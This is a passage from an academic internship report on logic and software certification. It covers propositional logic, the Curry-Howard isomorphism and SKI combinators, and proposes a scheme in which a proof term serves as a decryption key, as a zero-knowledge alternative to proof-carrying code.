2 Propositional logic 3
2.1 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
2.2 Generic Description . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
2.2.1 A Simplified Axiom System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.2.2 Natural Deduction System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.3 Classical, Intuitionistic & Minimal Logic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.4 Examples from Minimal Logic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
3 Curry-Howard Isomorphism 7
3.1 Correspondence between Hilbert-style Deduction Systems and Combinatory Logic . . . . . . 7
3.2 Proof as program : applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
4 SKI Combinatorial Calculus 8
4.1 Presentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
4.1.1 Definition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
4.1.2 Terms and Derivations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
4.2 Properties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
4.2.1 Computations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
4.2.2 Universal Qualities of SKI. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
5 Proofs as Cryptography 11
5.1 Communication Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
5.2 Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
5.3 Provable-Decryptable Equivalence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
5.3.1 Decryptable implies Provable . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
5.3.2 Provable implies Decryptable . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
5.4 Remarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
6 Applications 17
7 Conclusion and Future work 17
References 19
2
hal-00715726, version 1 - 9 Jul 2012
1 Introduction
Theobjectiveofthisstudyistoprovideamechanismbywhichahostsystemcandeterminewithcertainty
that it is safe to execute a program supplied by a source. For this to be possible, the code producer might
need to convince the consumer that the source code or the program satisfies certain required properties.
These properties can very well be the requirement that the program preserves certain invariants. One way
to achieve the goal is to make use of Proof-Carrying Code technique aka PCC [Nec97]: the code producer
supplies with the code a safety proof that attests to the code’s adherence to a previously defined safety
policy. The code consumer can then easily and quickly validate the proof. This technique doesn’t rely on
any cryptographic system.
An alternative way to achieve the goal could be to provide a way to delegate the proof of a property to
a possibly untrusted agent and have a small certificate guaranteeing that the proof has been done by the
agent. This technique is useful in cases where no predefined safety policy is required and the code producer
doesn’t have to prove the property on his own and hence speeds up the process at the code producer’s end.5
Being in the same setting as the PCC, the code producer and the code consumer could agree on a predefined
policy (property) and the code producer after writing the program proves the property but it doesn’t send
it along with the native source code. Another very important aspect of this mechanism is that it provides a
new interpretation of the Curry-Howard isomorphism for software certificates. In both the mechanisms we
rely on the analogy between proofs (safety proofs) and types. The analogy carries over to proof validation
and type checking.
This technique relies on cryptographic mechanisms and implements a zero-knowledge proof of the fact
that the proof in the hand of the prover is a correct proof of the property in question. The property to be
proven is seen as an encryption key while the proof-term is the corresponding secret key. Compared to PCC
technique which eventually is more of a code consumer friendly mechanism, the one that we have studied is
more of a code producer friendly technique as he doesn’t need to send the proof which could be of enormous
size.
This internship report starts with an introduction to propositional logic and a discussion on Curry-
Howard isomorphism and then it makes a detour from Proof Carrying Code technique to our technique
as an improved alternative to PCC. As a proof is done in the framework of typed SKIcombinatorial
calculus which is different from the one considered in the discussion of PCC, a complete section is devoted
on its presentation. Last but not least, a considerable amount of time was spent searching the appropriate
cryptographic system and hence a treatment of Functional encryption (initially thought to be useful) is left
in appendix.
2 Propositional logic
In mathematical logic, a propositional calculus or logic (also called sentential calculus or sentential logic)
is a formal system in which formulas of a formal language may be interpreted as representing propositions.
A system of inference rules and axioms allows certain formulas to be derived, called theorems; which may
be interpreted as truepropositions. The series of formulas which is constructed within such a system is
called a derivation and the last formula of the series is a theorem, whose derivation may be interpreted as a
proof of the truth of the proposition represented by the theorem. Truth-functional propositional logic is a
propositional logic whose interpretation limits the truth values of its propositions to two, usually trueand
false. Truth-functional propositional logic and systems isomorphic to it are considered to be zeroth-order
logic.
5. We suppose that the producer and the consumer have no prior communication and the consumer upon receiving a program
(written by a certain producer) wants to verify the validity of a certain property on the program.
3
hal-00715726, version 1 - 9 Jul 2012
2.1 Background
Every logic comprises a (formal) language for making statements about objects and reasoning about
properties of these objects. This view of logic is very general and actually we restrict our attention to
mathematical objects, programs, and data structures in particular. Statements in logical language are
constructed according to a predefined set of formation rules (depending on the language) called syntax rules .
A logical language can be used in different ways. For instance, a language can be used as a deduction
system(or a proof system); that is, to construct proofs or refutations. This use of a logical language is called
proof theory . In this case, a set of facts called axioms and a set of deduction rules (inference rules) are given,
and the object is to determine which facts follow from the axioms and the rules of inference. While using
logic as a proof system, one is not concerned with the meaning of the statements that are manipulated, but
with the arrangement of these statements, and specially, whether proofs or refutations can be constructed.
In this sense, statements in the language are viewed as cold facts and the manipulations involved are purely
mechanical, to the point that they could be carried out by a computer. This does not mean that finding a
proof for a statement does not require creativity, but that the interpretation of the statements is irrelevant.
However, the statements expressed in a logical language often have an intended meaning. The second
use of a formal language is for expressing statements that receive a meaning when they are given what is
called an interpretation. In this case, the language of logic is used to formalize properties of structures, and
determine when a statement is trueof a structure. This use of logical language is called model theory .
One of the interesting aspects of model theory is that it forces us to have a precise and rigorous definition
of the concept of truth in a structure. Depending on the interpretation that one has in mind, truth may have
quite a different meaning. For instance, whether a statement is trueorfalsemay depend on parameters. A
statement trueunder all interpretations of the parameters is said to be valid. A useful (and quite reasonable)
mathematical assumption is that the truth of a statement can be obtained from the truth (or falsity) of its
parts (sub-statements). From a technical point of view, this means that the truth of a statement is defined
by recursion on the syntactical structure of the statement.
The two aspects of logic described above are actually not independent, and it is the interaction between
the model theory and proof theory that makes logic an interesting and effective tool. One might say that
model theory and proof theory form a couple in which the individuals complement each other. To summarize,
alogicallanguagehasacertain syntax, andthemeaningor semantics ofstatementsexpressedinthislanguage
is given by an interpretation in a structure. Given a logical language and its semantics, one usually has one
or more proof systems for this logical system.
A proof system is acceptable only if every provable formula is indeed valid. In this case, we say that
the proof system is sound. Then, one tries to prove that the proof system is complete . A proof system is
complete if every valid formula is provable. Depending on the complexity of the semantics of a given logic,
it is not always possible to find a complete proof system for that logic. This is the case, for instance, for
second-order logic. However, there are complete proof systems for propositional logic and first-order logic.
In the first-order case, this only means that a procedure can be found such that, if the input formula is valid,
the procedure will halt and produce a proof. But this does not provide a decision procedure for validity.
Indeed, as a consequence of a theorem of Church, there is no procedure that will halt for every input formula
and decide whether or not a formula is valid.
There are many ways of proving the completeness of a proof system. Oddly, most proofs establishing
completeness only show that if a formula Ais valid, then there existsa proof ofA. However, such arguments
do not actually yield a method for constructing a proof ofA(in the formal system). Only the existence of
a proof is shown.
Propositional logic is the system of logic with the simplest semantics. Yet, many of the concepts and
techniques used for studying propositional logic generalize to first-order logic.
2.2 Generic Description
In general terms, a calculus is a formal system that consists of a set of syntactic expressions (well-formed
formulas), a distinguished subset of these expressions (axioms), plus a set of formal rules that define a specific
4
hal-00715726, version 1 - 9 Jul 2012
binary relation, intended to be interpreted as logical equivalence on the space of expressions. A propositional
calculus is a formal system L=L(A,Ω,Z,I)where :
– The set of alphabet Ais a finite set of elements called propositional symbols or propositional variables.
Syntactically speaking, these are the most basic elements of the formal language Lotherwise referred
to as atomic formulas or terminal elements.
–Ωis the set of a finite number of logical connectives. The set Ωis partitioned into disjoint subsets as :
Ω = Ω 0∪Ω1...∪Ωj...∪Ωn
The set Ωjis the set of all operators of arity j. In the more familiar propositional calculi Ωis typically
partitioned as follows:
Ω0={⊥,⊤}
Ω1={¬}
Ω2={∨,∧,→}
– The setZis a finite set of transformation rules that are called inference rules when they acquire logical
applications.
– The setIis the set of axioms in this language.
2.2.1 A Simplified Axiom System
We consider a propositional calculus L=L(A,Ω,Z,I)where :
– We consider the set Ato be large enough that would suffice the needs of our discussion. For example
A={p,q,r,s,t,u,v}.
– We take : Ω1={¬}andΩ2={→}.
– The setZis taken to be singleton, the rule being : if pandp→qaretruethen we can infer that q
is also true.
– The setIis the set of axioms in this language and consists precisely of the following ones:
–(p→(q→p))
–((p→(q→r))→((p→q)→(p→r)))
–((¬p→¬q)→(q→p))
2.2.2 Natural Deduction System
We consider a propositional calculus L=L(A,Ω,Z,I)where :
– ThesetAissupposedtobelargeenoughthatwouldsufficetheneeds. Forexample A={p,q,r,s,t,u,v}.
– We consider : Ω0={⊥,⊤},Ω1={¬}andΩ2={∨,∧,→}.
– The setZis a defined in Figure 1, the transformation rules are intended to be interpreted as the
inference rules of so called natural deduction system .
– The system presented here has just one axiom that says p→p.
Here we use the sequent notation A1,A2,...,An⊢Bto represent judgements in natural deduction. The
standard semantics of a judgement in natural deduction is that it asserts that whenever A1,A2...,Anare
alltrue,Bwill also be true.
2.3 Classical, Intuitionistic & Minimal Logic
The logics presented above are classical logic and in general they are characterized by a number of
equivalent axioms :
Proof by contradiction
5
hal-00715726, version 1 - 9 Jul 2012
⊤-introΓ⊢⊤
Γ⊢A Γ⊢B∧-introΓ⊢A∧B
Γ⊢A∨-introΓ⊢A∨B
Γ⊢B∨-introΓ⊢A∨B
Γ,A⊢B→-introΓ⊢A→B
Γ,A⊢⊥¬-introΓ⊢¬A
excluded middleΓ⊢A∨¬AΓ⊢⊥⊥-elimΓ⊢A
Γ⊢A∧B∧-elimΓ⊢A
Γ⊢A∧B∧-elimΓ⊢B
Γ⊢A∨B Γ,A⊢C Γ,B⊢C∨-elimΓ⊢C
Γ⊢A→B Γ⊢A→-elimΓ⊢B
Γ⊢A Γ⊢¬A¬-elimΓ⊢⊥
Figure 1: Inference rules of natural deduction
Law of the Excluded Middle
Double-Negation Elimination
Pierce’s Law ((A→B)→A)→A
We can define two other logical frameworks depending on the presence or absence of certain rules. To be
precise we are interested in Minimal and Intuitionistic logic. Defined in [Mer83] and developed by Ingebrigt
Johansson, minimal logic is a sub-logic of intuitionistic logic which means that set of provable propositions
in minimal logic is a proper subset of the corresponding set in intuitionistic logic.
In all the three logics we have two rules corresponding to negation:
–Elimination of negation : If we can prove a proposition Aand its negation ¬A, then we have a
contradiction noted ⊥.
–Introduction of negation : If a proposition Aleads to a contradiction then ¬Ais valid. The rule
can even be formulated as the definition of negation : ¬A:=A→⊥.
The three logics differ on the consequence drawn by a contradiction.
– Classical logic uses reductio ad absurdum and deduces from ¬A→⊥thatAis valid. This is in fact
the elimination rule for double negation because ¬A→⊥is the synonym of ¬¬A.
– Intuitionistic logic deduces any proposition from a contradiction: ⊥→Bwhich is the rule ex falso
quodlibet aka the principle of explosion.
– Minimal logic treats ⊥as any other proposition and hence has no particular significance.
2.4 Examples from Minimal Logic
Example 1: (¬A∧¬B↔¬(A∨B))
We suppose that we have ¬A∧¬Band prove that¬(A∨B)i.e. the hypothesis A∨Bleads to a
contradiction. We have two cases : if Ais valid then it is in contradiction with the hypothesis ¬Asimilarly
forB. So, in any case, we have a contradiction.
Conversely, we suppose that we have ¬(A∨B)and we prove¬Ai.e.Aleads to contradiction. But if
Ais valid then A∨Bis valid which contradicts the hypothesis. Similarly for B. However, we only have
6
hal-00715726, version 1 - 9 Jul 2012
(¬A∨¬B↔¬(A∧B)). The converse is valid only in classical logic.
Example 2: A→¬¬AWe suppose Athen the supplementary hypothesis ¬Aresults in a contradiction.
Hence we have the result. The converse is not valid in minimal logic and neither in intuitionistic logic.
However we have ¬¬¬A→¬A.
Example 3: We can show that in minimal logic ¬¬(A→B)→(¬¬A→¬¬B). But the converse is
valid both in intuitionistic and classical logic but not in minimal logic.
Example 4: For the contra-positive argument : we can show that in minimal logic we have (A→
B)→(¬B→ ¬A),(A→ ¬B)→(B→ ¬A)and (¬A→ ¬B)→(B→ ¬¬A)but we don’t have
(¬A→¬B)→(B→A)which is a variant of reductio ad absurdum .
3 Curry-Howard Isomorphism
In programming language theory and proof theory, the Curry-Howard isomorphism is the direct relation-
ship between computer programs and proofs. It is a generalization of a syntactic analogy between systems of
formal logic and computational calculi. The Curry-Howard isomorphism is the observation that two families
of formalisms—namely, the proof systems on one hand, and the models of computations on the other—are
in fact structurally the same kind of objects. In other words, a proof is a program, the formula it proves is
a type for the program.
In its more general formulation, the Curry-Howard isomorphism is a correspondence between formal
proof calculi and type systems for models of computations. In particular, it splits into two correspondences.
One at the level of formulas and types that is independent of which particular proof system or model of
computation is considered, and one at the level of proofs and programs which, this time, is specific to the
particular choice of proof system and model of computation considered.
At the level of formulas and types, the correspondence says that implication behaves as a function
type, conjunction as a product type (this may be called a tuple, a struct, a list, or some other term
depending on the language), disjunction as a sum type (this may be called a union), a falseformula as the
empty type and a trueformula as the singleton type (whose sole member is the null object). Quantifiers
correspond to dependent function space or products (as appropriate). The following table summarizes the
above discussion:
Logic side Programming side
universal quantification generalized function space(∏)type
existential quantification generalized cartesian product (∑)type
implication function type
conjunction product type
disjunction sum type
trueformula unit type
falseformula empty type
3.1 Correspondence between Hilbert-style Deduction Systems and Combina-
tory Logic
According to Curry: the simplest types for the basic combinators KandSof combinatory logic surpris-
ingly correspond to the respective axiom schemes α→(β→α)and(α→(β→γ))→((α→β)→(α→γ))
notedφin Figure 2 used in Hilbert-style deduction systems. A complete section is devoted on this calculus
as it is used to express formulas or properties of a program in our technique. We obtain a similar correspon-
dence where both the columns are in one-to-one correspondence.
7
hal-00715726, version 1 - 9 Jul 2012
Hilbert-style implication logic
α∈ΓassumptionΓ⊢α
axiomKΓ⊢α→(β→α)
axiomSΓ⊢φ
Γ⊢α→β Γ⊢αmodus ponensΓ⊢βSimply typed combinatory logic
x:α∈Γ
Γ⊢x:α
Γ⊢K:α→(β→α)
Γ⊢S:φ
Γ⊢E1:α→β Γ⊢E2:α
Γ⊢E1E2:β
Figure 2: Typed combinatory logic
Seen at a more abstract level, the correspondence can be restated as shown in the following table.
Logic side Programming side
assumption variable
axioms combinators
modus ponens application
3.2 Proof as program : applications
As seen above proofs act as programs and that a proof πof a property φis equivalent to saying that the
type of the λ-term associated with the proof is φ. This equivalence is useful in proof validation where one
has to validate a proof πof a property (or a formula) φ.
This is useful in applications where users need to be convinced that a free software developed by an
untrusted agent satisfies a certain property. This trust problem is specific for free software because : they
are not always developed by well-known companies (that users may trust), such software developments rely
on a large community of authors for development/ proofs or these developers cannot afford code signing by
a certifying authority.
Now the question that stands is how exactly a user can be convinced that a software (or a program) is
safe to use without relying on reputation or any certifying authority. There are several possibilities :
– using the Proof-Carrying Code framework [Nec97]
– probabilistic checking of the proof [AS92]
– checking that the poof has been constructed using zero-knowledge protocols and Curry-Howard iso-
morphism.
4 SKI Combinatorial Calculus
The logical framework in which we are working is not the same as the one used in the PCC [Nec97].
Our framework is that of a propositional calculus with a simplified axiomatic system. In the literature this
logic is called SKI(SK) Combinatorial Calculus. The following sections present the features of this logical
framework.
4.1 Presentation
We use the definition presented in subsection 2.2 to define SKIcalculus as an example of propositional
logic and in fact as the implicational fragment of any intuitionistic logic.
8
hal-00715726, version 1 - 9 Jul 2012
4.1.1 Definition
SKIcalculus is obtained for the following instance of the sets:
–A={p,q,r,s,t,u,v}or any such finite set. Another way of defining the alphabet would be to take
A={S,K,I, (,)}
–Ω2={→}.
– The rule of modus ponens : ifpandp→qaretruethen we can infer that qis also true.
– The setIbeing the set containing:
S:(p→(q→p))
K:((p→(q→r))→((p→q)→(p→r)))
I:(p→p)
4.1.2 Terms and Derivations
The setTof terms is defined recursively as follows:
1.S,K,Iare terms.
2. Ifτ1andτ2are terms, then (τ1τ2)is also a term.
3. Nothing is a term unless required to be by the rules 1 and 2.
A derivation is a finite sequence of terms satisfying the following rules:
1. If ∆is a derivation ending in the term α((Kβ)γ)ζ, then ∆followed by αβζis also a derivation.
2. If ∆is a derivation ending in the term α(Iβ)ζ, then ∆followed by αβζis also a derivation.
3. If ∆isaderivationendingintheterm α(((Sβ)γ)δ)ζ, then ∆followedby α((βδ)(γδ))isalsoaderivation.
4.2 Properties
The ceremony above captures much of the conventional style in which logicians present the combinator
calculus. But the conventional ceremony describing the combinator calculus does not match the natural
binary structure of the formal system. It is much more natural to understand the calculus as operating on
binary tree-structured terms with the symbols S,K,Iat the leaves. The parentheses are in some sense only
there to indicate the tree structure, and shouldn’t be regarded as part of the abstract alphabet.
Informally, and using programming language jargon, a tree (xy)can be thought of as a “function” x
applied to an “argument” y. When “evaluated”, the tree “returns a value” , i.e. transforms into another
tree. Of course, all three of the “function”, the “argument” and the “value” are either combinators, or binary
trees, and if they are binary trees they too may be thought of as functions whenever the need arises. The
evaluation operation is defined as follows :
Ireturns its argument :
Ix=x
Kwhen applied to any argument x, yields a one-argument constant function Kx, which, when applied
to any argument, returns x.
Kxy =x
Sis a substitution operator. It takes three arguments and then returns the first argument applied to the
third, which is then applied to the result of the second argument applied to the third. More clearly :
Sxyz = (xz)(yz)
9
hal-00715726, version 1 - 9 Jul 2012
4.2.1 Computations
Example 1: SKSK evaluates to KK(SK) by theS-rule. Then if we evaluate KK(SK) , we getKby
theK-rule. As no further rule can be applied, the computation halts there.
Example 2: For all trees αandβ,SKαβwill always evaluate to βin two steps, Kβ(αβ) =β, so the
ultimate result of evaluating SKαβwill always equal the result of evaluating β. We say that SKαandIare
“functionally” equivalent because they always yield the same result when applied to any β.
Example 3: Self-application SII is an expression that takes an argument and applies that argument
to itself:
SIIα =Iα(Iα) =αα
Example 4: Recursion We can write a function that applies something to the self application of
something else:
(S(Kα)(SII))β=Kαβ (SIIβ ) =α(SIIβ ) =α(ββ)
This function can be used to achieve recursion. If βis the function that applies to the self application of
something else, then self-applying βperformsαrecursively on ββ. More clearly, if β=S(Kα)(SII)then :
SIIβ =ββ=α(ββ) =α(α(ββ)) =...
Example 5: Reverser S(K(SI))K reverses the terms in αβ:
S(K(SI))Kαβ→K(SI)α(Kα)β→SI(Kα)β→Iβ(Kαβ )→Iβα→βα
Using example 2 it can be shown that SKIcalculus is not the minimum system that can fully perform the
computations of lambda calculus, as all occurrences of Iin any expression can be replaced by SKKorSKS
orSKand the resulting expression will yield the same result. So, Iis merely syntactic sugar.
4.2.2 Universal Qualities of SKI
The combinator calculus was designed precisely to be universal in the sense that it can accomplish every
conceivable rearrangement of sub-terms just by means of applying terms to them. That is, given a rule for
rearranging nsymbols into the shape of a term (allowing copying and deleting of individual symbols), there
is a term that can be applied to each choice of nsymbols so that several derivation steps will accomplish
that rearrangement. The examples of SIIas a repeater and S(K(SI))K as a reverser suggest how this
works. This particular quality of a formal system is called combinatory completeness . Every formal system
that contains something acting like Sand something like Kis combinatorialy complete.
Rearrangement arise in formal systems whenever we substitute symbols with variables. The combinator
calculus was designed specifically to show that substitution for variables can be reduced to more primitive
looking operations.
By accident, the combinator calculus turns out to be universal in a much more powerful sense than
combinatory completeness. The combinator calculus is a universal programming system —its derivation can
accomplish everything than can be accomplished by computation. That is, terms can be understood as
programs, and every program that we can write in every programming language can be written also as a
term in the combinator calculus. Since formal systems are the same thing as computing systems, every
formal system can be described as an interpretation of the terms in the combinator calculus. In short, the
combinator calculus is Turing complete . Last but not least, SKIcalculus generates the implication fragment
of intuitionistic logic.
As seen above the combinators S,K,Iare functions and hence as the lambda calculus terms they are
equivalent to :
10
hal-00715726, version 1 - 9 Jul 2012
–S:=λx.λy.λz. (xz)(yz)
–K:=λx.λy.x
–I:=λx.x
Using the typing rules defined in Figure 2 we can talk about typed SKIcalculus. We observe that not
all the terms in the calculus are typable. One of the example is the term in the example 3 of 4.2.1. From
now on,SKIcalculus refers to the typed SKIcalculus.
5 Proofs as Cryptography
This section presents our alternative to the PCC technique where we use cryptographic techniques to
implement a zero-knowledge proof of the validity of a proof of a given property . We should note that
we have not been able to make the technique completely functional. Part of this section presents the goal
and the steps that we have taken to tackle the different problems that we have faced and highlights some of
these which remain unresolved.
There are several ways to present the communication model between the user and the developer, hitherto
called consumer and producer respectively. This change in nomenclature is in consonance with the different
possible models. One of the possible model implementing this technique could be: instead of proving a
property of a program on the developer’s side, we delegate the proof to an untrusted agent and we receive
a small certificate guaranteeing that the proof has been done by this agent. We can even generalize this
mechanism where the communication is done on a broadcast communication network, where terminals on
the other end are provers and the user is the verifier. Upon receiving a program, the user might need to
verify if a property holds for the program and so he gets in touch with provers (in broadcast network) and
verifies if any of the provers has a valid proof.
We can even have a model where the user and the developer have no prior communication on the property
andtheuseruponreceivingaprogram(writtenbyacertaindeveloper)wantstoverifythevalidityofacertain
property on the program. He then looks for a zero-knowledge proof of the validity of the proof.
Another possible model could follow the same route as the PCC technique where the user and the
developer agree on a property and then after writing the program the developer proves the property on the
program and then sends the program (not the proof) to the user. The user then verifies the validity of the
proof and ultimately forwards it to the waiting process. The following subsection discusses the latter one
which remains in tune with the PCC except the fact that the proof term ( λ-term) corresponding to the proof
is not sent along with the program.
5.1 Communication Protocol
In fact, the protocol can be conceived in the following way and a schematic representation is given by
Figure 3. The user and the developer agree on a property φthat a program must satisfy. The developer
writes a program P, proves the property φonPand sends it to the user. The user then uses cryptographic
means to verify the validity of the proof. The property gives the encryption key while a proof term π(λ-term
corresponding to the proof) gives a secret key. He then encrypts a nonce using the property and sends it
to the developer, if the developer has a valid proof, he has a decryption algorithm (eventually depending
on theλ-term corresponding to the proof) which can decrypt the nonce and the developer then sends the
decrypted nonce to the user. The user verifies the exactitude of the nonce sent and the nonce received. This
zero-knowledge proof conception makes our principle far more simpler and efficient compared to PCC.
5.2 Encryption
The predefined property φis expressed in the (typed) SKIcombinatorial calculus discussed in section 4.
We give a recursive definition to the way a nonce {n}is encrypted under a property (a formula) φ. For that
we define or initialize keys for each atomic terms like p,q,rused to define the alphabet A, and we denote
11
hal-00715726, version 1 - 9 Jul 2012
• •φ
• •P
• •{n}φ
• •Decπ({n}φ)
User (P,φ) Developer (P,φ)
Figure 3: Communication Protocol
them byKp,Kq,Kr. We then define the key Kp→qas{Kq}Kpto be read as the key Kqencrypted under
the keyKp. Finally, encryption of a nonce {n}under any formula A→Bis the set{KA,{n}KB}. The
following examples encrypt a nonce {n}under the axioms of the SKIcalculus.
Example I: We encrypt a nonce {n}underIas{n}p→pwhich is the set Kp,{n}Kp.
Example S:{n}underSis{n}(p→(q→p))which is the set{Kp,{n}q→p}and which eventually is the set
{Kp,Kq,{n}Kp}
Example K:{n}underKis{n}((p→(q→r))→((p→q)→(p→r)))which is:
{K(p→(q→r)),{n}(p→q)→(p→r)}={{Kq→r}Kp,Kp→q,{n}p→r}
={{{Kr}Kq}Kp,{Kq}Kp,Kp,{n}Kr}
5.3 Provable-Decryptable Equivalence
Loosely speaking, decryption of a nonce {n}encrypted under a formula Fis actually an algorithm that
(at each instant) makes a choice from the available keys and a key encrypted under this key or eventually
the nonce under the chosen key. If the property is provable in the SKIcalculus, the process terminates with
the decrypted nonce. Before delving in the problem of proving the fact that having a proof is equivalent to
having a decryption algorithm, we can see that the examples taken in the previous subsection proves the
fact that the encryption process has the soundness property. The Provable-Decryptable equivalence can even
be expressed by saying that one cannot decrypt a nonce encrypted under a formula that is not provable in
theSKIcalculus.
5.3.1 Decryptable implies Provable
The only operator in our logic is implication →, two rules of natural deduction that correspond to
introduction and elimination of →are :
Γ,A⊢B(→)introductionΓ⊢A→BΓ⊢A Γ⊢A→B(→)eliminationΓ⊢B
12
hal-00715726, version 1 - 9 Jul 2012
The introduction rule corresponds to the axiom Iwhile the elimination rule corresponds to the inference
rule of modus ponens in our logic.6We observe that the encryption algorithm implements a recursive →
elimination which is to ascend upwards in the (→)introduction rule and that at any stage of the derivation
tree (corresponding to the proof) and for any sequent A1,A2,...,An⊢Bthe encryption at this stage gives
{KA1,KA2,...,KAn,{n}B}. Thus the antecedent correspond to the keys while the succedent gives the
encryption of the nonce under the key corresponding to it. The process terminates when the succedent is an
atomic term (a formula devoid of the operator →).
The decryption process starts by searching the key corresponding to the atomic term under which the
nonceisencryptedoranyavailableencryptionofthekey. Thedecryptionofthiskeymightrequiredecryption
of other keys. Each decryption (of either a key or eventually the nonce) mirrors into the application of
(→) elimination rule. For instance, {Kp,{Kq}Kp,{n}Kq}corresponds to the encryption using the sequent
p,(p→q)⊢q, which is precisely the (→)elimination. In general if KΓdecrypts{n}KAthen Γ⊢A.
Decryptabilityimpliestheexistenceofafunction πsuchthatπ(KΓ) =KA. Thefunction πinfactimplements
a recursive application of modus ponens and hence implements (→)elimination rule. So, if encryption is
ascendingupwards(awayfromtheroot)7inthederivationtree,decryptionisdescendingdownwards(towards
theroot)inthederivationtreeandhenceisequivalenttobuildingtheprooftree. Thisprovesthat decryptable
implies provable.
5.3.2 Provable implies Decryptable
This part of the implication is non-trivial and hence requires careful observation via examples.
Example 1 p→((p→q)→q)Encryption of a nonce nunder the formula gives :
{n}p→((p→q)→q)={Kp,{n}((p→q)→q)}
={Kp,Kp→q,{n}Kq}
={Kp,{Kq}Kp,{n}Kq}
p,(p→q)⊢pp,(p→q)⊢(p→q)
p,(p→q)⊢qEncryption termination stepp⊢(p→q)→q
⊢p→((p→q)→q)
Proof 1: Proof tree
We use the available key Kpto retrieveKqand ultimately n.
To be more formal we can use the proof-term corresponding to Proof 1 to decrypt the nonce. The proof-term
corresponding to the above formula is : λx.λf.fx and captures the idea of typing rules : ifxis of typepand
fis of typep→qthenfxis of typeq.
The corresponding decryption algorithm would be λx.λf.λc.c (fx)and works in the following way :
λx.λf.λc.c (fx){n}p→((p→q)→q)=λx.λf.λc.c (fx)Kp{Kq}Kp{n}Kq
={n}Kq({Kq}KpKp)
={n}KqKq
=n
6. Using the soundness of →wrt⊢: ifΓ→A, then Γ⊢A, and completeness of →wrt⊢: ifΓ⊢A, then Γ→A.
7. root being the formula to be proven
13
hal-00715726, version 1 - 9 Jul 2012
Example 2 ((p→q)→q)→p
{n}((p→q)→q)→p={K(p→q)→q,{n}Kp}
={{Kq}{{Kq}Kp},{n}Kp}
As no free key is available it seems we cannot decrypt nand this is exactly what we expect(if we hope
that provability implies decryptability) because the above formula is not provable in our logic. We can check
different formulations of contra-positive argument :
Example 3.1 (p→q)→((q→r)→(p→r))
{n}(p→q)→((q→r)→(p→r))={{Kq}Kp,{Kr}Kq,Kp,{n}Kr}
Example 3.2 (p→(q→r))→(q→(p→r))
{n}(p→(q→r))→(q→(p→r))={{{Kr}Kq}Kp,Kq,Kp,{n}Kr}
Example 3.3 ((p→r)→(q→r))→(q→((p→r)→r))
{n}((p→r)→(q→r))→(q→((p→r)→r))={{{Kr}Kq}{{Kr}Kp},Kq,{Kr}Kp,{n}Kr}
Example 3.4 ((p→r)→(q→r))→(q→p)
{n}((p→r)→(q→r))→(q→p)={
{{Kr}Kq}{{Kr}Kp},Kq,{n}Kp}
The first three decryptions are obvious and follow the same pattern as in the first example. But the
fourth encryption cannot be reversed and again the reason shouldbe the fact that the last formula is not
provable in our logic (subsection 2.4).
Example 4⊢((p→q)→r)→(q→r)
Encryption of a nonce ngives
{n}((p→q)→r)→(q→r)={{Kr}{{Kq}Kp},Kq,{n}Kr}
At the first sight the above nonce does not seem to be decryptable but here we note that the formula is
provable and a derivation tree is given in Proof 2.
p,q,(p→q)→r⊢q
q,(p→q)→r⊢(p→q)q,(p→q)→r⊢(p→q)→r
q,(p→q)→r⊢rEncryption termination step(p→q)→r⊢(q→r)
⊢((p→q)→r)→(q→r)
Proof 2: Proof tree
A careful observation would reveal that to decrypt the nonce the developer either needs the key Kpor
{Kq}Kpwhile knowing Kq. The second case is realizable because the developer can ask the user to encrypt
Kqunder the key Kp(that he doesn’t have). A number of questions on security might arise but it seems to
be a legitimate demand on the part of developer. And if we permit such queries the decryption is automatic.
14
hal-00715726, version 1 - 9 Jul 2012
From the perspective of the proof term :
λH.λH 0.H(λ x
Kp. H0
Kq)

Kp→q
ifxis of typep,H0oftypeqandHoftype (p→q)→r, then the typeof the initial formula is given by
theλ-term given above. In terms of encryption keys, the decryption algorithm substitutes xbyKp,H0by
Kqand soλx.H 0byKp→q. So, a decryption algorithm would indeed need the key Kp→q={Kq}Kpin order
to decrypt the nonce. We observe that in the proof term His applied to a λ-term which is not the case in
the previous examples.
Example 5.1 (((p→r)→r)→((q→r)→r))→(((p→q)→r)→r)
A noncenencrypts to :
{n}(((p→r)→r)→((q→r)→r))→(((p→q)→r)→r)=K(((p→r)→r)→((q→r)→r)),{n}((p→q)→r)→r
={
{K(q→r)→r}K(p→r)→r,{Kr}Kp→q,{n}Kr}
={
{{Kr}{{Kr}Kq}}{{Kr}{{Kr}Kp}},{Kr}{{Kq}Kp},{n}Kr}
Once again formula not being provable implies that the nonce cannot be retrieved.
Example 5.2 (((p→q)→r)→r)→(((p→r)→r)→((q→r)→r))
A noncenencrypted under the formula is given as :
{n}(((p→q)→r)→r)→(((p→r)→r)→((q→r)→r))={K((p→q)→r)→r,{n}(((p→r)→r)→((q→r)→r))}
={K((p→q)→r)→r,K(p→r)→r,{n}(q→r)→r}
={{Kr}{{Kr}{{Kq}Kp}},{Kr}{{Kr}Kp},{n}(q→r)→r}
={{Kr}{{Kr}{{Kq}Kp}},{Kr}{{Kr}Kp},{Kr}Kq,{n}Kr}
Before analyzing an encrypted nonce under this formula which is the converse of the implication in the
previous example, we observe that a proof does exist and is given by the derivation tree in Proof 3.
If we have a look at the proof term
